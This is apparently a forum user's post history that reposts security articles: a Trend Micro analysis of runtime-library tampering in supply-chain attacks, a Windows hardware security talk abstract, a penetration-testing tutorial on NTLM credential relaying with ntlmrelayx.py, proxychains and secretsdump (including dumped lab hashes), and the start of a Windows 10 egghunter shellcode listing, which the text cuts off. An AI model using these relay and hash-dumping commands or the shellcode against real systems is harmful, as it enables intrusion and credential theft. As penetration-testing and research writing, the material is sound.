-
Posts
18753 -
Joined
-
Last visited
-
Days Won
726
Everything posted by Nytro
-
Analyzing C/C++ Runtime Library Code Tampering in Software Supply Chain Attacks Posted on:April 22, 2019 at 7:30 am Posted in:Malware Author: Trend Micro By Mohamad Mokbel For the past few years, the security industry’s very backbone — its key software and server components — has been the subject of numerous attacks through cybercriminals’ various works of compromise and modifications. Such attacks involve the original software’s being compromised via malicious tampering of its source code, its update server, or in some cases, both. In either case, the intention is to always get into the network or a host of a targeted entity in a highly inconspicuous fashion — which is known as a supply chain attack. Depending on the attacker’s technical capabilities and stealth motivation, the methods used in the malicious modification of the compromised software vary in sophistication and astuteness. Four major methods have been observed in the wild: The injection of malicious code at the source code level of the compromised software, for native or interpreted/just-in-time compilation-based languages such as C/++, Java, and .NET. The injection of malicious code inside C/C++ compiler runtime (CRT) libraries, e.g., poisoning of specific C runtime functions. Other less intrusive methods, which include the compromise of the update server such that instead of deploying a benign updated version, it serves a malicious implant. This malicious implant can come from the same compromised download server or from another completely separate server that is under the attacker’s control. The repackaging of legitimate software with a malicious implant. Such trojanized software is either hosted on the official yet compromised website of a software company or spread via BitTorrent or other similar hosting zones. This blog post will explore and attempt to map multiple known supply chain attack incidents that have happened in the last decade through the four methods listed above. The focus will be on Method 2, whereby a list of all poisoned C/C++ runtime functions will be provided, each mapped to its unique malware family. Furthermore, the ShadowPad incident is taken as a test case, documenting how such poisoning happens. Methods 1 and 2 stand out from the other methods because of the nature of their operation, which is the intrusive and more subtle tampering of code — they are a category in their own right. However, Method 2 is far more insidious since any tampering in the code is not visible to the developer or any source code parser; the malicious code is introduced at the time of compilation/linking. Examples of attacks that used a combination of Methods 1 and 3 are: The trojanization of MediaGet, a BitTorrent client, via a poisoned update (mid-February 2018). The change employed involved a malicious update component and a trojanized copy of the file mediaget.exe. The Nyetya/MeDoc attack on M.E.Doc, an accounting software by Intellect Service, which delivered the destructive ransomware Nyetya/NotPetya by manipulating its update system (April 2017). The change employed involved backdooring of the .NET module ZvitPublishedObjects.dll. The KingSlayer attack on EventID, which resulted in the compromise of the Windows Event Log Analyzer software’s source code (service executable in .NET) and update server (March 2015). An example of an attack that solely made use of Method 3 is the Monju incident, which involved the compromise of the update server for the media player GOM Player by GOMLab and resulted in the distribution of a variant of Gh0st RAT toward specific targets (December 2013). For Method 4, we have the Havex incidents, which involved the compromise of multiple industrial control system (ICS) websites and software installers (different dates in 2013 and 2014). Examples of attacks that used a combination of Methods 2 and 3 are: Operation ShadowHammer, which involved the compromise of a computer vendor’s update server to target an unknown set of users based on their network adapters’ media access control (MAC) addresses (June 2018). The change employed involved a malicious update component. An attack on the gaming industry (Winnti.A), which involved the compromise of three gaming companies and the backdooring of their respective main executables (publicized in March 2019). The CCleaner case, which involved the compromise of Piriform, resulting in the backdooring of the CCleaner software (August 2017). The ShadowPad case, which involved the compromise of NetSarang Computer, Inc., resulting in the backdooring of all of the company’s products (July 2017). The change employed involved malicious code that was injected into the library nssock2.dll, which was used by all of the company’s products. Methods 2 and 3 were also used by the Winnti group, which targeted the online video game industry, compromising multiple companies’ update servers in an attempt to spread malicious implants or libraries using the AheadLib tool (2011). Another example is the XcodeGhost incident (September 2015), in which Apple’s Xcode integrated development environment (IDE) and the compiler’s CoreServices Mach-O object file were modified to include malware that would infect every iOS app built (via the linker) with the trojanized Xcode IDE. The trojanized version was hosted on multiple Chinese file sharing services, resulting in hundreds of trojanized apps’ landing on the iOS App Store unfettered. An interesting case that shows a different side to the supply chain attack methods is the event-stream incident (November 2018). Event-stream is one of the widely used packages by npm (Node.js package manager), a package manager for the JavaScript programming language. A package known as flatmap-stream was added as a direct dependency to the event-stream package. The original author/maintainer of the event-stream package delegated publishing rights to another person, who then added the malicious flatmap-stream package. This malicious package targeted specific developers working on the release build scripts of the bitcoin wallet app Copay, all for the purpose of stealing bitcoins. The malicious code got written into the app when the build scripts were executed, thereby adding another layer of covertness. In most supply chain attack cases that have been happening for almost a decade, the initial infection vector is unknown or at least not publicly documented. Moreover, the particulars of how the malicious code gets injected into the benign software codebase are not documented either, whether from a forensics or a tactics, techniques, and procedures (TTP) standpoint. However, we will attempt to show how Method 2, which employs sophisticated tampering of code and is harder to detect, is used by attackers in a supply chain attack, using the ShadowPad case as our sample for analysis. An In-Depth Analysis of Method 2 – Case Study: ShadowPad There are subtle differences and observations between tampering with the original source code, as in Method 1, and tampering with the C/C++ runtime libraries, as in Method 2. Depending on the nature and location of the changes, the former might be easier to spot, whereas the latter would be much harder to detect if no file monitoring and integrity checks had been in place. All of the reported cases where the C/C++ runtime time libraries are poisoned or modified are for Windows binaries. Each case has been statically compiled with the Microsoft Visual C/C++ compiler with varying linker versions. Additionally, all of the poisoned functions are not part of the actual C/C++ standard libraries, but are specific to Microsoft Visual C/C++ compiler runtime initialization routines. Table 1 shows the list of all known malware families with their tampered runtime functions. Malware Family Poisoned Microsoft Visual C/C++ Runtime Functions ShadowHammer __crtExitProcess(UINT uExitCode) // exits the process. Checks if it’s part of a managed app // it is a CRT wrapper for ExitProcess Gaming industry (HackedApp.Winnti.A) __scrt_common_main_seh(void) // entrypoint of the c runtime library (_mainCRTStartup) with support for structured exception handling which calls the program’s main() function CCleaner Stage 1: __scrt_common_main_seh(void) Stage 2 -> dropped(32- bit) _security_init_cookie() Stage 2 -> dropped (64- bit) _security_init_cookie() void __security_init_cookie(void); // Initializes the global security cookie // used for buffer overflow protection ShadowPad _initterm(_PVFV * pfbegin, _PVFV * pfend); // call entries in function pointer table // The entry (0x1000E600) is the malicious one Table 1. List of poisoned/modified Microsoft Visual CRT functions in supply chain attacks It’s the linker’s responsibility to include the necessary CRT library for providing the startup code. However, a different CRT library could be specified via an explicit linker flag. Otherwise, the default statically linked CRT library libcmt.lib, or another, is used. The startup code performs various environment setup operations prior to executing the program’s main() function. Such operations include exception handling, thread data initialization, program termination, and cookie initialization. It’s important to note that the CRT implementation is compiler-, compiler option-, compiler version-, and platform-specific. Microsoft used to ship the Visual C runtime library headers and compilation files that developers could build themselves. For example, for Visual Studio 2010, such headers would exist under “Microsoft Visual Studio 10.0\VC\crt”, and the actual implementation of the ShadowPad poisoned function _initterm() would reside inside the file crt0dat.c as follows (all comments were omitted for readability purposes): This internal function is responsible for walking a table of function pointers (skipping null entries) and initializing them. It’s called only during the initialization of a C++ program. The poisoned DLL nssock2.dll is written in the C++ language. The argument pfbegin points to the first valid entry on the table, while pfend points to the last valid entry. The definition of the function type _PVFV is inside the CRT file internal.h: The above function is defined in the crt0dat.c file. The object file crt0dat.obj resides inside the library file libcmt.lib. Figure 1 shows ShadowPad’s implementation of _initterm(). Figure 1. ShadowPad poisoned _initterm() runtime function Figure 2 shows the function pointer table for ShadowPad’s _initterm() function as pointed to by pfbegin and pfend. This table is used for constructing objects at the beginning of the program particularly for calling C++ constructors, which is what’s happening in the screenshot below. Figure 2. Function pointer table for ShadowPad poisoned _initterm() runtime function As shown in Figure 2, the function pointer entry labeled malicious_code at the virtual address 0x1000F6A0 has been poisoned to point to a malicious code (0x1000E600). It’s more accurate to say that it is the function pointer table that was poisoned rather than the function _initterm(). Figure 3 shows the cross-reference graph of the _initterm() CRT function as referenced by the compiled ShadowPad code. The graph shows all call paths (reachability) that lead to it, and all other calls it makes itself. The actual call path that leads to executing the ShadowPad code is: DllEntryPoint() -> __DllmainCRTStartup() -> _CRT_INIT() -> _initterm() -> __imp_initterm() -> malicious_code() via function pointer table. Figure 3. Call cross-reference graph for ShadowPad poisoned _initterm() runtime function Note that the internal function _initterm() is called from within the CRT initialization function __CRT_INIT(), which is responsible for C++ DLL initialization and has the following prototype: One of its responsibilities is invoking the C++ constructors for the C++ code in the DLL nssock2.dll, as demonstrated earlier. The said function is implemented inside the CRT file crtdll.c -> object file crtdll.obj -> library file msvcrt.lib. The following code snippet shows the actual implementation of the function _CRT_INIT(). So, how could an attacker poison any of those CRT functions? It’s possible to overwrite the original benign libcmt.lib/msvcrt.lib library with a malicious one, or modify the linker flag such that it points to a malicious library file. Another possibility is by hijacking the linking process such that as the linker is resolving all references to various functions, the attacker’s tool monitors this process, intercepts it, and feeds it a poisoned function definition instead. The backdooring of the compiler’s key executables, such as the linker binary itself, can be another stealthy poisoning vector. Conclusion Although the attacks for Method 2 are very low in number, difficult to predict, and possibly targeted, when one takes place, it can be likened to a black swan event: It will catch victims off guard and its impact will be widespread and catastrophic. Tampering with CRT library functions in supply chain attacks is a real threat that requires further attention from the security community, especially when it comes to the verification and validation of the integrity of development and build environments. Steps could be taken to ensure clean software development and build environments. Maintaining and cross-validating the integrity of the source code and all compiler libraries and binaries are good starting points. The use of third-party libraries and code must be vetted and scanned for any malicious indicators prior to integration and deployment. Proper network segmentation is also essential for separating critical assets in the build and distribution (update servers) environments from the rest of the network. Important as well is the enforcement of very strict access with multifactor authentication to the release build servers and endpoints. Of course, these steps do not exclude or relinquish the developers themselves from the responsibility of continuously monitoring the security of their systems. Sursa: https://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks/
-
The security features of modern PC hardware are enabling new trust boundaries and attack resistance capabilities unparalleled in software alone. These hardware capabilities help to improve resistance to a wide range of attacks including physical attacks against DMA and disk encryption, kernel and remote code exploits, and even application isolation through virtualization. In this talk, we will review the metamorphosis and fundamental re-architecture of Windows to take advantage of emerging hardware security capabilities. We will also examine in-depth the hardware security features provided by vendors such as Intel, AMD, ARM and others, and explain how Windows takes advantage of these features to create new and powerful security boundaries and exploit mitigations. Finally, we will discuss the new attack surface that hardware provides and review exploit case studies, lessons learned, and mitigations for attacks that target PC hardware and firmware. Speaker Bio: David Weston is a group manager in the Windows team at Microsoft, where he currently leads the Windows Device Security and Offensive Security Research teams. David has been at Microsoft working on penetration testing, threat intelligence, platform mitigation design, and offensive security research since Windows 7. He has previously presented at security conferences such as Blackhat, CanSecWest and DefCon.
-
Playing with Relayed Credentials June 27, 2018 Home Blogs Playing with Relayed Credentials During penetration testing exercises, the ability to make a victim connect to an attacker’s controlled host provides an interesting approach for compromising systems. Such connections could be a consequence of tricking a victim into connecting to us (yes, we act as the attackers ) by means of a Phishing email or, by means of different techniques with the goal of redirecting traffic (e.g. ARP Poisoning, IPv6 SLAAC, etc.). In both situations, the attacker will have a connection coming from the victim that he can play with. In particular, we will cover our implementation of an attack that involves using victims’ connections in a way that would allow the attacker to impersonate them against a target server of his choice - assuming the underlying authentication protocol used is NT LAN Manager (NTLM). General NTLM Relay Concepts The oldest implementation of this type of attack, previously called SMB Relay, goes back to 2001 by Sir Dystic of Cult of The Dead Cow- who only focused on SMB connections – although, he used nice tricks especially when launched from Windows machines where some ports are locked by the kernel. I won’t go into details on how this attack works, since there is a lot of literature about it (e.g. here) and an endless number of implementations (e.g. here and here). However, it is important to highlight that this attack is not related to a specific application layer protocol (e.g. SMB) but is in fact an issue with the NT LAN Manager Authentication Protocol (defined here). There are two flavors for this attack: Relay Credentials to the victim machine (a.k.a. Credential Reflection): In theory, fixed by Microsoft starting with MS08-068 and then extended to other protocols. There is an interesting thread here that attempts to cover this topic. Relay Credentials to a third-party host (a.k.a. Credential Relaying): Still widely used, with no specific patch available since this is basically an authentication protocol flaw. There are effective workarounds that could help against this issue (e.g. packet signing) only if the network protocol used supports it. There were, however, some attacks against this protection as well (e.g. CVE-2015-0005). In a nutshell, we could abstract the attack to the NTLM protocol, regardless of the underlying application layer protocol used, as illustrated here (representing the second flavor described above): Over the years, there were some open source solutions that extended the original SMB attack to other protocols (a.k.a. cross-protocol relaying). A few years ago, Dirk-Jan Mollema extended the impacket’s original smbrelayx.py implementation into a tool that could target other protocols as well. We decided to call it ntlmrelayx.py and since then, new protocols to relay against have been added: SMB / SMB2 LDAP MS-SQL IMAP/IMAPs HTTP/HTTPs SMTP I won’t go into details on the specific attacks that can be done, since again, there are already excellent explanations out there (e.g. here and here ). Something important to mention here is that the original use case for ntlmrelayx.py was basically a one-shot attack, meaning that whenever we could catch a connection, an action (or attack) would be triggered using the successfully relayed authentication data (e.g. create a user through LDAP, download a specific HTTP page, etc.). Nevertheless, amazing attacks were implemented as part of this approach (e.g. ACL privilege escalation as explained here). Also, initially, most of the attacks only worked for those credentials that had Administrative privileges, although over time we realized there were more possible use cases targeting regular users. These two things, along with an excellent presentation at DEFCON 20 motivated me into extending the use cases into something different. Value every session, use it, and reuse it at will When you’re attacking networks, if you can intercept a connection or attract a victim to you, you really want to take full advantage of it, regardless of the privileges of that victim’s account. The higher the better of course, but you never know the attack paths to your objectives until you test different approaches. With all this in mind, coupled with the awesome work done on ZackAttack , it was clear that there could be an extension to ntlmrelayx.py that would strive to: Try to keep it open as long as possible once the authentication data is successfully relayed Allow these sessions to be used multiple times (sometimes even concurrently) Relay any account, regardless of its privilege at the target system Relay to any possible protocol supporting NTLM and provide a way that would be easy to add new ones Based on these assumptions I decided to re-architect ntlmrelayx.py to support these scenarios. The following diagram describes a high-level view of it: We always start with a victim connecting to any of our Relay Servers which are servers that implement support for NTLM as the authentication mechanism. At the moment, we have two Relay Servers, one for HTTP/s and another one for SMB (v1 and v2+), although there could be more (e.g. RPC, LDAP, etc.). These servers know little about both the victim and target. The most important part of these servers is to implement a specific application layer protocol (in the context of a server) and engage the victim into the NTLM Authentication process. Once the victim took the bait, the Relay Servers look for a suitable Relay Protocol Client based on the protocol we want to relay credentials to at the target machines (e.g. MSSQL). Let’s say a victim connects to our HTTP Server Relay Server and we want to relay his credentials to the target’s MSSQL service (HTTP->MSSQL). For that to happen, there should be a MSSQL Relay Protocol Client that could establish the communication with the target and relay the credentials obtained by the Relay Server. A Relay Protocol Client plugin knows how to talk a specific protocol (e.g. MSSQL), how to engage into an NTLM authentication using relayed credentials coming from a Relay Server and then keep the connection alive (more on that later). Once a relay attempt worked, each instance of these Protocol Clients will hold a valid session against the target impersonating the victim’s identity. We currently support Protocol Clients for HTTP/s, IMAP/s, LDAP/s, MSSQL, SMB (v1 and 2+) and SMTP, although there could be more! (e.g. POP3, Exchange WS, etc.). At this stage the workflow is twofold: If ntlmrelayx.py is running configured to run one-shot actions, the Relay Server will search for the corresponding Protocol Attack plugin that implements the static attacks offered by the tool. If ntlmrelayx.py is running configured with -socks, not action will be taken, and the authenticated sessions will be hold active, so it can later on be used and reused through a SOCKS proxy. SOCKS Server and SOCKS Relay plugins Let’s say we’re running in -socks mode and we have a bunch of victims that took the bait. In this case we should have a lot of sessions waiting to be used. The way we implemented the use of these involves two main actors: SOCKS Server: A SOCKS 4/5 Server that holds all the sessions and serves them to SOCKS clients. It also tries these sessions to be kept up even if not used. In order to do that, a keepAlive method on every session is called from time to time. This keepalive mechanism is bound to the particular protocol connection relayed (e.g. this is what we do for SMB ). SOCKS Relay Plugin: When a SOCKS client connects to the SOCKS Server, there are some tricks we will need to apply. Since we’re holding connections that are already established (sessions), we will need to trick the SOCKS client that an authentication is happening when, in fact, it’s not. The SOCKS server will also need to know not only the target server the SOCKS client wants to connect against but also the username, so it can verify whether or not there’s an active session for it. If so, then it will need to answer the SOCKS client back successfully (or not) and then tunnel the client thru the session's connection. Finally, whenever the SOCKS client closes the session (which we don’t really want to do since we want to keep these sessions active) we would need to fake those calls as well. Since all these tasks are protocol specific, we’ve created a plugins scheme that would let contributors add more protocols that would run through SOCKS (e.g. Exchange Web Services?). We’re currently supporting tunneling connections through SOCKS for SMB, MSSQL, SMTP, IMAP/S, HTTP/S. With all this information being described, let’s get into some hands-on examples. Examples in Action The best way to understand all of this is through examples, so let’s get to playing with ntlmrelayx.py. First thing you should do is install the latest impacket. I usually play with the dev version but if you want to stay on the safe side, we tagged a new version a few weeks ago. Something important to have in mind (especially for Kali users), is that you have to be sure there is no previous impacket version installed since sometimes the new one will get installed at a different directory and the old one will still be loaded first (check this for help). Always be sure, whenever you run any of the examples that the version banner shown matches the latest version installed. Once everything is installed, the first thing to do is to run ntlmrelayx.py specifying the targets (using the -t or -tf parameters) we want to attack. Targets are now specified in URI syntax, where: Scheme: specifies the protocol to target (e.g. smb, mssql, all) Authority: in the form of domain\username@host:port ( domain\username are optional and not used - yet) Path: optional and only used for specific attacks (e.g. HTTP, when you need to specify a BASE URL) For example, if we specify the target as mssql://10.1.2.10:6969, every time we get a victim connecting to our Relay Servers, ntlmrelayx.py will relay the authentication data to the MSSQL service (port 6969) at the target 10.1.2.10. There’s a special case for all://10.1.2.10. If you specify that target, ntlmrelayx.py will expand that target based on the amount of Protocol Client Plugins available. As of today, that target will get expanded to ‘smb://’, ‘mssql://’, ‘http://’, ‘https://’, ‘imap://’, ‘imaps://’, ‘ldap://’, ‘ldaps://’ and ‘smtp://’, meaning that for every victim connecting to us, each credential will be relayed to those destinations (we will need a victim’s connection for each destination). Finally, after specifying the targets, all we need is to add the -socks parameter and optionally -smb2support (so the SMB Relay Server adds support for SMB2+) and we’re ready to go: # ./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies [*] Protocol Client SMTP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Running in relay mode to hosts in targetfile [*] SOCKS proxy started. Listening at port 1080 [*] IMAP Socks Plugin loaded.. [*] IMAPS Socks Plugin loaded.. [*] SMTP Socks Plugin loaded.. [*] MSSQL Socks Plugin loaded.. [*] SMB Socks Plugin loaded.. [*] HTTP Socks Plugin loaded.. [*] HTTPS Socks Plugin loaded.. [*] Setting up SMB Server [*] Setting up HTTP Server [*] Servers started, waiting for connections Type help for list of commands ntlmrelayx> And then with the help of Responder, phishing emails sent or other tools, we wait for victims to connect. Every time authentication data is successfully relayed, you will get a message like: [*] Authenticating against smb://192.168.48.38 as VULNERABLE\normaluser3 SUCCEED [*] SOCKS: Adding VULNERABLE/NORMALUSER3@192.168.48.38(445) to active SOCKS connection. Enjoy At any moment, you can get a list of active sessions by typing socks at the ntlmrelayx.py prompt: ntlmrelayx> socks Protocol Target Username Port -------- -------------- ------------------------ ---- SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445 MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25 SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25 IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143 As can be seen, there are multiple active sessions impersonating different users against different targets/services. These are some of the targets/services specified initially to ntlmrelayx.py using the -tf parameter. In order to use them, for some use cases, we will be using proxychains as our tool to redirect applications through our SOCKS proxy. When using proxychains, be sure to configure it (configuration file located at /etc/proxychains.conf) pointing the host where ntlmrealyx.py is running; the SOCKS port is the default one (1080). You should have something like this in your configuration file: [ProxyList] socks4 192.168.48.1 1080 Let’s start with the easiest example. Let’s use some SMB sessions with Samba’s smbclient. The list of available sessions for SMB are: Protocol Target Username Port -------- -------------- ------------------------ ---- SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445 SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 Let’s say we want to use the CONTOSO/NORMALUSER1 session, we could do something like this: root@kalibeto:~# proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK Enter CONTOSO\normaluser1's password: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Dec 7 19:07:54 2017 .. DR 0 Thu Dec 7 19:07:54 2017 Default DHR 0 Tue Jul 14 03:08:44 2009 desktop.ini AHS 174 Tue Jul 14 00:59:33 2009 normaluser1 D 0 Wed Nov 29 14:14:50 2017 Public DR 0 Tue Jul 14 00:59:33 2009 5216767 blocks of size 4096. 609944 blocks available smb: \> A few important things here: You need to specify the right domain and username pair that matches the output of the socks command. Otherwise, the session will not be recognized. For example, if you didn’t specify the domain name on the smbclient parameter, you would get an output error in ntmlrelayx.py saying: [-] SOCKS: No session for WORKGROUP/NORMALUSER1@192.168.48.230(445) available When you’re asked for a password, just put whatever you want. As mentioned before, the SOCKS Relay Plugin that will handle the connection will fake the login process and then tunnel the original connection. Just in case, using the Administrator’s session will give us a different type of access: root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK Enter VULNERABLE\Administrator's password: Try "help" to get a list of possible commands. smb: \> dir $Recycle.Bin DHS 0 Thu Dec 7 19:08:00 2017 Documents and Settings DHS 0 Tue Jul 14 01:08:10 2009 pagefile.sys AHS 1073741824 Thu May 3 16:32:43 2018 PerfLogs D 0 Mon Jul 13 23:20:08 2009 Program Files DR 0 Fri Dec 1 17:16:28 2017 Program Files (x86) DR 0 Fri Dec 1 17:03:57 2017 ProgramData DH 0 Tue Feb 27 15:02:13 2018 Recovery DHS 0 Wed Sep 30 18:00:31 2015 System Volume Information DHS 0 Wed Jun 6 12:24:46 2018 tmp D 0 Sun Mar 25 09:49:15 2018 Users DR 0 Thu Dec 7 19:07:54 2017 Windows D 0 Tue Feb 27 16:25:59 2018 5216767 blocks of size 4096. 609996 blocks available smb: \> Now let’s play with MSSQL, we have the following active sessions: ntlmrelayx> socks Protocol Target Username Port -------- -------------- ------------------------ ---- MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 impacket comes with a tiny TDS client we can use for this connection: root@kalibeto:# proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:1433-<><>-OK [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (120 19136) [!] Press help for extra shell commands SQL> select @@servername -------------------------------------------------------------------------------------------------------------------------------- WIN7-A\SQLEXPRESS SQL> I’ve tested other TDS clients as well successfully. As always, the most important thing is to specify correctly the domain/username information. Another example that is very interesting to see in action is using IMAP/s sessions with Thunderbird’s native SOCKS proxy support. Based on this exercise, we have the following IMAP session active: Protocol Target Username Port -------- -------------- ------------------------ ---- IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143 We need to configure an account in Thunderbird for this user. A few things to have in mind when doing so: It is important to specify Authentication method ‘Normal Password’ since that’s the mechanism the IMAP/s SOCKS Relay Plugin currently supports. Keep in mind, as mentioned before, this will be a fake authentication. Under Server Setting->Advanced you need to set the ‘Maximum number of server connections to cache’ to 1. This is very important otherwise Thunderbird will try to open several connections in parallel. Finally, under the Network Setting you will need to point the SOCKS proxy to the host where ntlmrelayx.py is running, port 1080: Now we’re ready to use that account: You can even subscribe to other folders as well. If you combine IMAP/s sessions with SMTP ones, you can fully impersonate the user’s mailbox. Only constrain I’ve observed is that there’s no way to keep alive a SMTP session. It will last for a fixed period of time that is configured through a group policy (default is 10 minutes). Finally, just in case, for those boxes we have Administrative access on, we can just run secretsdump.py through proxychain and get the user’s hashes: root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230 ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef::: Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb::: [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE::: Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO::: serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE::: [*] Dumping LSA Secrets [*] $MACHINE.ACC VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38::: [*] DPAPI_SYSTEM 0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+...... 0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|.. 0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679 [*] NL$KM 0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u.... 0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK From this point on, you probably don’t need to use the relayed credentials anymore. Final Notes Hopefully this blog post gives some hints on what the SOCKS support in ntlmrealyx.py is all about. There are many things to test, and surely a lot of bugs to solve (there are known stability issues). But more important, there are still many protocols supporting NTLM that haven’t been fully explored! I’d love to get your feedback and as always, pull requests are welcomed. If you have questions or comments, feel free to reach out to me at @agsolino. Acknowledgments Dirk-Jan Mollema (@_dirkjan) for his awesome job initially in ntlmrelayx.py and then all the modules and plugins contributed over time. Martin Gallo (@MartinGalloAr) for peer reviewing this blog post. Sursa: https://www.secureauth.com/blog/playing-relayed-credentials
-
- 1
-
-
Windows 10 egghunter (wow64) and more Published April 23, 2019 | By Peter Van Eeckhoutte (corelanc0d3r) Introduction Ok, I have a confession to make, I have always been somewhat intrigued by egghunters. That doesn’t mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it’s a good practise to try to avoid egghunters if you can, as they tend to slow things down. What I mean, is that I have been fascinated by techniques to search memory without making the process crash. It’s just a personal thing, it doesn’t matter too much. What really matters is that Corelan Team is back. Well, I’m back. This is my (technical) first post in nearly 3 years, and the first post since Corelan Team kind of “faded out” before that. (In fact, I’m curious to see if (some of) the original Corelan Team members would be able to find spare time again to join forces and to start doing / publishing some research. I certainly hope so but let’s see what happens.) As some of you already know, I have recently left my day job. (long story, too long for this post. Glad to share details over a drink). I have launched a new company called “Corelan Consulting” and I’m trying to make a living through exploit development training and CyberSecurity consulting. Trainings are going well, with 2019 almost completely filled up, and already planning classes in 2020. You can find the training schedules here. If you’re interested in setting up the Corelan Bootcamp or Corelan Advanced class in your company or at a conference – read the testimonials first and then contact me I still need to work on my sales skills in relation with locking in consulting gigs, but I’m sure things will work out fine in the end. (Yes, please contact me if you’d like me to work with you, I’m available for part-time governance/risk management & assessment work ;-)) Anyway, while building the 2019 edition of the Corelan Bootcamp, updating the materials for Windows 10, I realised that the wow64 egghunter for Windows 7, written by Lincoln, no longer works on Windows 10. In fact, I kind of expected it to fail, as we already knew that Microsoft keeps changing the syscall numbers with every major Windows release. And since the most commonly used version egghunter mechanism is based on the use of a system call, it’s clear that changing the number will break the egghunter. By the way : the system calls (and their numbers) are documented here: https://j00ru.vexillium.org/syscalls/nt/64/ (Thanks Mateusz “j00ru” Jurczyk). You can find the evolution of the “NtAccessCheckAndAuditAlarm” system call number in the table on the aforementioned website. Anyway, changing a system call number doesn’t really sound all too exciting or difficult, but it also became clear that the arguments & stack layout, the behavior of the system call in Windows 10, also differs from the Windows 7 version. We found some win10 egghunter PoCs flying around, but discovered that they did not work reliably in real exploits. Lincoln looked at it for a few moments, did some debugging andd produced a working version for Windows 10. So, that means we’re quite proud to be able to announce a working (wow64) egghunter for windows 10. The version below has been tested in real exploits and targets. wow64 egghunter for Windows 10 As explained, the challenge was to figure out where & how the new system call expects it’s arguments, how it changes registers & the stack to make sure that the arguments are always in the right place and provide the intended functionality: to test if a given page is accessible or not, and to do so without making the process die. This is what the updated routine looks like: "\x33\xD2" #XOR EDX,EDX "\x66\x81\xCA\xFF\x0F" #OR DX,0FFF "\x33\xDB" #XOR EBX,EBX "\x42" #INC EDX "\x52" #PUSH EDX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x6A\x29" #PUSH 29 (system call 0x29) "\x58" #POP EAX "\xB3\xC0" #MOV BL,0C0 "\x64\xFF\x13" #CALL DWORD PTR FS:[EBX] (perform the system call) "\x83\xC4\x10" #ADD ESP,0x10 "\x5A" #POP EDX 